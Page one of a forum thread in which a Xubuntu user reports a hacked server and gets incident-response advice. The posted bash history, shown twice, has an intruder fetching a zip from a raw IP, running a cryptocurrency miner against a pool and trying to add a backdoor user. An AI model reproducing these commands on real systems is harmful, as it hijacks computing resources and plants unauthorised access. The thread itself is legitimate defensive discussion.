Page 1 of 3 123 LastLast
Results 1 to 10 of 26

Thread: Xubuntu 12.04/64, OpenSSH Server Hacked

  1. #1
    Join Date
    Sep 2009
    Location
    Norway
    Beans
    46
    Distro
    Ubuntu 13.10 Saucy Salamander

    Xubuntu 12.04/64, OpenSSH Server Hacked

    Last night I discovered a task on my Xubuntu 12.04/64 server (yes, conky is nice to have) as a process "m64.pl" used about 85-100% CPU time. After checking with everyone in my family I see the only option, I have got hacked, possibly through a Windows 7 computer since port 22 is closed in DSL router.

    Here is bash history left by hacker :

    free -m
    cat /proc/cpuinfo
    uname -a
    ls -l
    cd Public
    wget 79.114.47.143/m64.zip
    unzip m64.zip
    chmod +x *
    ./m64.pl -o stratum+tcp://linuxpower.cf:3333 -u sebywarlord.1 -p miningltcs -B
    ps -x
    pgrep minerd
    w
    ifconfig
    sude
    sudo
    sudo useradd ruut
    useradd ruut
    su root useradd
    exit

    To me it seems that someone has started a bitcoin task

    What I have done is killing the process, remove files in /Public (had to do it in root as they where locked) and uninstall "OpenSSH Server".

    Any suggestions on how to handle this would be most appreciated

    Morten (Smiling after all)
    Last edited by mbogevik; February 4th, 2014 at 07:54 PM.

  2. #2
    Join Date
    Sep 2009
    Location
    Norway
    Beans
    46
    Distro
    Ubuntu 13.10 Saucy Salamander

    Re: Xubuntu 12.04/64, OpenSSH Server Hacked

    It may be that the login is not a SSH login since both of my users says "Last login: Fri Jan 17 12:06:37 2014" while entering command "lastlog". Also I have Hamachi online on the computer. Still investigating...

  3. #3
    Join Date
    Jan 2008
    Location
    Bay Area, CA/Kanagawa, JP
    Beans
    248
    Distro
    Xubuntu 13.10 Saucy Salamander

    Re: Xubuntu 12.04/64, OpenSSH Server Hacked

    lol... don't open your ssh server with PW auth to the wild world of the internet? You can see the ssh login attempts at /var/log/auth.log

    i'd wipe and reinstall the system if i were you..

  4. #4
    Join Date
    Jun 2007
    Location
    Porirua, New Zealand
    Beans
    Hidden!
    Distro
    Ubuntu

    Re: Xubuntu 12.04/64, OpenSSH Server Hacked

    Thread moved to Security Discussions.
    Forum DOs and DON'Ts
    Never assume that information you find using a search engine is up-to-date.

  5. #5
    Join Date
    Jan 2009
    Beans
    Hidden!
    Distro
    Ubuntu 14.04 Trusty Tahr

    Re: Xubuntu 12.04/64, OpenSSH Server Hacked

    Quote Originally Posted by brokenhachi View Post
    lol... don't open your ssh server with PW auth to the wild world of the internet? You can see the ssh login attempts at /var/log/auth.log

    i'd wipe and reinstall the system if i were you..
    +1 on wiping and reinstalling.

    Also, in the future be sure to disable password authentication in /etc/ssh/sshd_config.

    This is a great tutorial on how to setup key-based authentication with your ssh server.

  6. #6
    Join Date
    Oct 2009
    Beans
    Hidden!
    Distro
    Ubuntu 12.04 Precise Pangolin

    Re: Xubuntu 12.04/64, OpenSSH Server Hacked

    Quote Originally Posted by mbogevik View Post
    free -m
    cat /proc/cpuinfo
    uname -a
    ls -l
    cd Public
    wget 79.114.47.143/m64.zip
    unzip m64.zip
    chmod +x *
    ./m64.pl -o stratum+tcp://linuxpower.cf:3333 -u sebywarlord.1 -p miningltcs -B
    ps -x
    pgrep minerd
    w
    ifconfig
    sude
    sudo
    sudo useradd ruut
    useradd ruut
    su root useradd
    exit
    If this was a hacker, they should have known what system they were accessing via uname -a, so they wouldn't have tried to run su root, because the root user is locked in a default install of Ubuntu.

    Do you have any other services running on this box? Just because ssh is not open to the internet does not mean another server isn't open to the internet.
    Come to #ubuntuforums! We have cookies! | Basic Ubuntu Security Guide

    Tomorrow's an illusion and yesterday's a dream, today is a solution...

  7. #7
    Join Date
    Nov 2013
    Beans
    368

    Re: Xubuntu 12.04/64, OpenSSH Server Hacked

    If this was a hacker, they should have known what system they were accessing via uname -a, so they wouldn't have tried to run su root, because the root user is locked in a default install of Ubuntu.
    Perhaps he's still in training camp?

    +1 to the recommendation to reinstall, then make sure you properly secure any internet-facing services. I would also be highly suspicious of all the other computers on this network. I would reimage them all.

    There's some fun facts to pull out of your bash history. The IP comes back to Romania. The name "sebywarlord" includes some interesting online profiles:

    1. Seems to be a Romanian fellow just looking for love http://www.lets101.com/sebywarlord/profile

    2. He might be a gamer, there are a bunch of gamer forum profiles.

    3. Stack Exchange account with that name posted a pic of himself
    http://stackoverflow.com/users/3076388/sebywarlord

    4. Sebywarlord is a member of 2 illegal-looking forums where he posted the outcome of what looks like a brute forcing script.
    Attached Images Attached Images
    I've been using vi for years, mostly because I can't figure out how to exit.

  8. #8
    Join Date
    Oct 2009
    Beans
    Hidden!
    Distro
    Ubuntu 12.04 Precise Pangolin

    Re: Xubuntu 12.04/64, OpenSSH Server Hacked

    Quote Originally Posted by bashiergui View Post
    Perhaps he's still in training camp?

    +1 to the recommendation to reinstall, then make sure you properly secure any internet-facing services. I would also be highly suspicious of all the other computers on this network. I would reimage them all.
    +1 to that. I would check /var/log/auth.log for any unusual entries and also check to see which processes are listening on that box before wiping it (take it off the network at least).

    Code:
    sudo netstat -nlp
    Come to #ubuntuforums! We have cookies! | Basic Ubuntu Security Guide

    Tomorrow's an illusion and yesterday's a dream, today is a solution...

  9. #9
    Join Date
    Sep 2009
    Location
    Norway
    Beans
    46
    Distro
    Ubuntu 13.10 Saucy Salamander

    Re: Xubuntu 12.04/64, OpenSSH Server Hacked

    Yes, large number of login attempts in /var/log/auth.log...

    But the thing is I do not have port 22 open on router (DSL), only Teamspeak 3 server and my kids Minecraft server is open to the world.

    I think that I first need to find how this person got access, wipe and reinstall may not help if it is through a Windows 7 computer or any other "box" on my LAN, like Xbox 360, Raspberry Pi, VU++ satellite tuner, Popcorn media player or even the Synology DS213j NAS. But in the end I think the six computers with Windows 7 is the largest gift to a hacker.

    I check the netstat command when back from work
    Last edited by mbogevik; February 5th, 2014 at 12:23 PM.

  10. #10
    Join Date
    Nov 2013
    Beans
    368

    Re: Xubuntu 12.04/64, OpenSSH Server Hacked

    This guy (the hacker) isn't the sharpest knife in the drawer. Check logs on your minecraft & teamspeak servers for connections to the same IP.

    It doesn't really matter how he got in. You could spend a ton of money and time trying to find out. I recommend you focus on inspecting each box the best you can for any evidence of intrusion. Then reimage the ones that are affected. Then figure out how to secure the network.

    This of course assumes you have backups... If you don't then unplug the network from the Internet and go buy yourself an external drive to copy all your data to it.
    Last edited by bashiergui; February 5th, 2014 at 04:07 PM.
    I've been using vi for years, mostly because I can't figure out how to exit.

Page 1 of 3 123 LastLast

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •